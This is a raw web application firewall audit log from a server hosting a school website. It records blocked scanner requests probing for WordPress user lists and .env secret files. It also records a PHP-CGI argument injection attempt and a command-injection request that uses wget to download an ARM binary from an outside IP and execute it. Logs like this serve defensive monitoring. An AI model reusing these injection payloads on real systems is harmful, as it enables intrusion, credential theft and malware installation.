"ENABLED" --1e274c1b-Z-- --8619170d-A-- [13/Jun/2025:04:44:22 +0700] aEtKNh1N9VxFJpQ5cVhLEQAAAIg 103.236.140.4 46100 103.236.140.4 8181 --8619170d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.43.94.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.43.94.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8619170d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8619170d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749764662591516 2890 (- - -) Stopwatch2: 1749764662591516 2890; combined=1296, p1=444, p2=823, p3=0, p4=0, p5=29, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8619170d-Z-- --af425400-A-- [13/Jun/2025:04:48:07 +0700] aEtLF8mhAKaFi0V9-ROoDAAAANY 103.236.140.4 46128 103.236.140.4 8181 --af425400-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.62.62.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.62.62.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --af425400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af425400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749764887959790 2489 (- - -) Stopwatch2: 1749764887959790 2489; combined=1183, p1=423, p2=734, p3=0, p4=0, p5=26, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af425400-Z-- --332ef67e-A-- [13/Jun/2025:05:18:26 +0700] aEtSMsmhAKaFi0V9-ROoFgAAAMw 103.236.140.4 46290 103.236.140.4 8181 --332ef67e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3888.0 Safari/537.36 Accept-Charset: utf-8 --332ef67e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --332ef67e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749766706717396 856 (- - -) Stopwatch2: 1749766706717396 856; combined=333, p1=293, p2=0, p3=0, p4=0, p5=39, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --332ef67e-Z-- --7ee13a55-A-- [13/Jun/2025:05:18:27 +0700] aEtSM8mhAKaFi0V9-ROoFwAAAM4 103.236.140.4 46292 103.236.140.4 8181 --7ee13a55-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.1 Accept-Charset: utf-8 --7ee13a55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ee13a55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749766707344179 795 (- - -) Stopwatch2: 1749766707344179 795; combined=358, p1=323, p2=0, p3=0, p4=0, p5=35, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ee13a55-Z-- --2fca4971-A-- [13/Jun/2025:05:23:30 +0700] aEtTYh1N9VxFJpQ5cVhLIAAAAIo 103.236.140.4 46300 103.236.140.4 8181 --2fca4971-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.119.97.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.119.97.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2fca4971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fca4971-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749767010002640 2679 (- - -) Stopwatch2: 1749767010002640 2679; combined=1193, p1=381, p2=783, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fca4971-Z-- --a306a72f-A-- [13/Jun/2025:05:30:48 +0700] aEtVGMmhAKaFi0V9-ROoHQAAANU 103.236.140.4 46346 103.236.140.4 8181 --a306a72f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.82.150.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.82.150.86 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a306a72f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a306a72f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749767448444521 3461 (- - -) Stopwatch2: 1749767448444521 3461; combined=1513, p1=516, p2=960, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a306a72f-Z-- --284b9d66-A-- [13/Jun/2025:05:32:32 +0700] aEtVgB1N9VxFJpQ5cVhLJgAAAJM 103.236.140.4 46378 103.236.140.4 8181 --284b9d66-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.100.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.100.2 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --284b9d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --284b9d66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749767552455999 863 (- - -) Stopwatch2: 1749767552455999 863; combined=390, p1=350, p2=0, p3=0, p4=0, p5=40, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --284b9d66-Z-- --12905d20-A-- [13/Jun/2025:05:39:42 +0700] aEtXLsmhAKaFi0V9-ROoLQAAANQ 103.236.140.4 46416 103.236.140.4 8181 --12905d20-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.236.76.100 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.236.76.100 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --12905d20-C-- --12905d20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12905d20-E-- --12905d20-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749767982693824 4372 (- - -) Stopwatch2: 1749767982693824 4372; combined=3046, p1=491, p2=2514, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12905d20-Z-- --7753954f-A-- [13/Jun/2025:06:21:34 +0700] aEtg_u9dCOerv4VGhqQezQAAABE 103.236.140.4 46680 103.236.140.4 8181 --7753954f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7753954f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7753954f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749770494250020 3313 (- - -) Stopwatch2: 1749770494250020 3313; combined=1388, p1=502, p2=856, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7753954f-Z-- --0c1b7d43-A-- [13/Jun/2025:06:48:55 +0700] aEtnZx1N9VxFJpQ5cVhQJgAAAIM 103.236.140.4 41842 103.236.140.4 8181 --0c1b7d43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.185.109.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.185.109.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0c1b7d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c1b7d43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749772135195685 3039 (- - -) Stopwatch2: 1749772135195685 3039; combined=1378, p1=447, p2=900, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c1b7d43-Z-- --ef09e63f-A-- [13/Jun/2025:07:01:59 +0700] aEtqd-9dCOerv4VGhqQsZQAAABE 103.236.140.4 40970 103.236.140.4 8181 --ef09e63f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 Accept-Charset: utf-8 --ef09e63f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef09e63f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749772919115985 770 (- - -) Stopwatch2: 1749772919115985 770; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef09e63f-Z-- --cda3fb72-A-- [13/Jun/2025:07:08:15 +0700] aEtr7-9dCOerv4VGhqQwNwAAABY 103.236.140.4 55788 103.236.140.4 8181 --cda3fb72-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; LGMS428) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --cda3fb72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda3fb72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773295199460 941 (- - -) Stopwatch2: 1749773295199460 941; combined=444, p1=400, p2=0, p3=0, p4=0, p5=43, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda3fb72-Z-- --f529ed49-A-- [13/Jun/2025:07:08:40 +0700] aEtsCO9dCOerv4VGhqQwigAAAAk 103.236.140.4 56518 103.236.140.4 8181 --f529ed49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Accept-Charset: utf-8 --f529ed49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f529ed49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773320923516 747 (- - -) Stopwatch2: 1749773320923516 747; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f529ed49-Z-- --52774f20-A-- [13/Jun/2025:07:09:54 +0700] aEtsUv8ql0QLmijbYWapPgAAAEs 103.236.140.4 58398 103.236.140.4 8181 --52774f20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.118.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.118.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52774f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52774f20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749773394141702 2918 (- - -) Stopwatch2: 1749773394141702 2918; combined=1535, p1=498, p2=1002, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52774f20-Z-- --ac232c35-A-- [13/Jun/2025:07:12:35 +0700] aEts8_8ql0QLmijbYWaqHwAAAEo 103.236.140.4 34214 103.236.140.4 8181 --ac232c35-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3Bsh%20-c%20%22route%20add%20-host%20141.98.11.147%20reject%3B%20route%20add%20-host%20141.98.11.147%20gw%20141.98.11.147%22%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --ac232c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac232c35-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773555318837 921 (- - -) Stopwatch2: 1749773555318837 921; combined=422, p1=383, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac232c35-Z-- --8a58ba04-A-- [13/Jun/2025:07:16:19 +0700] aEtt0_8ql0QLmijbYWarmgAAAEk 103.236.140.4 39506 103.236.140.4 8181 --8a58ba04-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 Accept-Charset: utf-8 --8a58ba04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a58ba04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749773779439167 729 (- - -) Stopwatch2: 1749773779439167 729; combined=322, p1=284, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a58ba04-Z-- --7abd1546-A-- [13/Jun/2025:08:12:09 +0700] aEt66R1N9VxFJpQ5cVhw7gAAAJg 103.236.140.4 34448 103.236.140.4 8181 --7abd1546-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.249.55.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.249.55.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7abd1546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7abd1546-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749777129203004 2856 (- - -) Stopwatch2: 1749777129203004 2856; combined=1249, p1=435, p2=759, p3=0, p4=0, p5=55, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7abd1546-Z-- --4d4b5238-A-- [13/Jun/2025:08:14:49 +0700] aEt7icmhAKaFi0V9-RPSCwAAAMA 103.236.140.4 37516 103.236.140.4 8181 --4d4b5238-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux; rv:67.0) Gecko/20100101 Firefox/67.0 Accept-Charset: utf-8 --4d4b5238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d4b5238-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] 